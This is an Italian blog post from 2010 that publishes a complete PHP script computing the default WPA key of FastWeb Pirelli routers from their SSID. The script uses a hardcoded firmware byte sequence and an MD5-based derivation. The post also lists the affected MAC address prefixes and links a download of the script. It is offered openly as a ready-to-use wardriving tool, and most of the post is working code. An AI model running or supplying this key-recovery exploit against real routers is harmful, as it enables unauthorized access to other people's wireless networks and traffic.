Date: 2010-06-05 06:18:13
Author: evilsocket
Categories: Exploiting, Hacking, PHP, Programmazione, Sorgenti, Wardriving
Tags: chiave, fastweb, hack, key, pirelli, ssid, telsey, warcracking, wifi, win32, wpa
Title: Script per il calcolo della chiave WPA dei router FastWeb Pirelli.

Oggi mi sono inbattuto per caso in <a href="http://www.oversecurity.net/wpa-recovery/" target="_blank">questo servizio</a>, ovvero un servizio per "recuperare" la chiave WPA di un router Fastweb Pirelli.

"Bene" mi sono detto, "Se hanno questo servizio, avranno anche una pagina dove spiegano l'algoritmo e pubblicano il codice" .

Beh, la <a href="http://www.oversecurity.net/2010/03/29/recupero-chiave-wpa-fastweb-dettagli-tecnici/" target="_blank">pagina</a> c'era, e non era nemmeno un loro lavoro bensì quello di un altro gruppo (vedere il link "fonte" alla fine di quell'articolo), ma non c'era il sorgente!

In pratica, queste persone, hanno preso il lavoro che altri hanno pubblicato <strong>liberamente e per tutti</strong>, lo hanno ri-pubblicato (citando la fonte eh, per carità), ne hanno ricavato un servizio (guarda caso un servizio che fa gola a molti su un sito con degli ads pubblicitari) ma non hanno condiviso a loro volta le conoscenze distribuendo il codice del servizio ... un po disonesto non vi pare?

Cioè, se io prendo un informazione libera, sono moralmente tenuto a rendere altrettanto libera qualsiasi opera io ne possa ricavare ... non legalmente, ma moralmente.

Ebbene, ci penso io con un mio script fresco fresco :D

<break>

Vi posto qui di seguito il codice di uno script PHP che, seguendo quell'algoritmo, parte dal SSID di un router e stampa la chiave WPA di default.

Ribadisco, come loro, che :

Attualmente è possibile recuperare la chiave Wireless degli Access Point <strong>FastWeb Pirelli</strong>, nello specifico con i seguenti Mac Address:
<blockquote><em>00:08:27 Pirelli Broadband Solutions
00:13:C8 </em><em>Pirelli Broadband Solutions</em>
<em>00:17:C2 Pirelli Broadband Solutions
00:19:3E P</em><em>irelli Broadband Solutions</em>
<em>00:1C:A2 </em><em>Pirelli Broadband Solutions</em>
<em>00:1D:8B </em><em>Pirelli Broadband Solutions</em>
<em>00:22:33 Pirelli Broadband Solutions
00:23:8E </em><em>Pirelli Broadband Solutions</em>
<em>00:25:53 </em><em>Pirelli Broadband Solutions</em>
<em>00:03:6F </em><em>Telsey S.p.A.</em><em> </em><em>(in fase di Test)
00:21:96 Telsey S.p.A.</em><em> (in fase di Test)</em></blockquote>
Detto questo, a breve pubblicherò uno script analogo ma per i router Alice, dato che stanno uscendo lavori anche in questo senso ;)

<pre>

<div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;width:100%;height:100%;"><div class="text codecolorer">&nbsp; &amp;lt;?php<br />
/***************************************************************************<br />
&nbsp;* &nbsp; FastWeb Pirelli WPA Discovery &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net &nbsp; &nbsp; &nbsp;*<br />
&nbsp;* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; This program is free software; you can redistribute it and/or modify &nbsp;*<br />
&nbsp;* &nbsp; it under the terms of the GNU General Public License as published by &nbsp;*<br />
&nbsp;* &nbsp; the Free Software Foundation; either version 2 of the License, or &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; (at your option) any later version. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; This program is distributed in the hope that it will be useful, &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; but WITHOUT ANY WARRANTY; without even the implied warranty of &nbsp; &nbsp; &nbsp; &nbsp;*<br />
&nbsp;* &nbsp; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. &nbsp;See the &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; GNU General Public License for more details. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;*<br />
&nbsp;* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; You should have received a copy of the GNU General Public License &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; along with this program; if not, write to the &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; Free Software Foundation, Inc., &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;* &nbsp; 59 Temple Place - Suite 330, Boston, MA &nbsp;02111-1307, USA. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; *<br />
&nbsp;***************************************************************************/<br />
<br />
/*<br />
&nbsp;* SSID di partenza.<br />
&nbsp;*/<br />
$ssid &nbsp; = &quot;FASTWEB-1-00193EA1B2C3&quot;;<br />
/*<br />
&nbsp;* 20 byte costanti cablati nel firmware dei Pirelli Fastweb.<br />
&nbsp;*/<br />
$seq_20 = &quot;\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66&quot;;<br />
/*<br />
&nbsp;* Prelevo la parte finale del SSID.<br />
&nbsp;*/ <br />
$sn &nbsp; &nbsp; = split( '-', $ssid );<br />
$sn &nbsp; &nbsp; = $sn[2];<br />
/*<br />
&nbsp;* La divido in gruppi di due caratteri, formando un array<br />
&nbsp;* di 6 rappresentazioni esadecimali di byte.<br />
&nbsp;*/<br />
preg_match_all( &quot;/[a-f0-9]{2}/i&quot;, $sn, $sn_bytes );<br />
$sn_bytes = $sn_bytes[0];<br />
/*<br />
&nbsp;* Inizializzo una stringa con il valore intero di questi byte.<br />
&nbsp;*/<br />
$str = &quot;&quot;;<br />
for( $i = 0; $i &amp;lt; 6; $i++ ){<br />
&nbsp; &nbsp; $str .= chr( hexdec( $sn_bytes[$i] ) );<br />
}<br />
echo &quot;$str\n&quot;;<br />
<br />
<br />
/* <br />
&nbsp;* Aggiungo alla stringa i 20 byte &quot;magici&quot;.<br />
&nbsp;*/ <br />
$str .= $seq_20;<br />
/*<br />
&nbsp;* Ricavo i byte dell'hash md5 della stringa<br />
&nbsp;*/<br />
preg_match_all( &quot;/[a-f0-9]{2}/i&quot;, md5($str), $md5_bytes );<br />
$md5_bytes = $md5_bytes[0];<br />
$long &nbsp; &nbsp; &nbsp;= &quot;&quot;;<br />
/*<br />
&nbsp;* Converto i byte in sequenze binarie di 8 bit.<br />
&nbsp;*/<br />
foreach( $md5_bytes as $byte ){<br />
&nbsp; &nbsp; $long .= sprintf( &quot;%08s&quot;, decbin( hexdec($byte) ) );<br />
}<br />
/*<br />
&nbsp;* Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero <br />
&nbsp;* di un gruppo sia maggiore di 0x0a, aggiungo 0x57.<br />
&nbsp;*/<br />
$hex_5 = array();<br />
for( $i = 0; $i &amp;lt; 25; $i += 5 ){<br />
&nbsp; &nbsp; $n &nbsp; &nbsp; &nbsp; = bindec( substr( $long, $i, 5 ) );<br />
&nbsp; &nbsp; $hex_5[] = $n &amp;gt; 0x0a ? $n + 0x57 : $n;<br />
}<br />
/*<br />
&nbsp;* Compongo la chiave.<br />
&nbsp;*/ <br />
$wpa = &quot;&quot;;<br />
foreach( $hex_5 as $hex ){<br />
&nbsp; &nbsp; $wpa .= sprintf( &quot;%02x&quot;, $hex );<br />
}<br />
<br />
print &quot;WPA : $wpa\n&quot;;<br />
<br />
?&amp;gt;</div></div>

</pre>

<strong><a href="http://sharecash.org/download.php?file=1279027" target="_blank">SCARICA SCRIPT</a></strong>
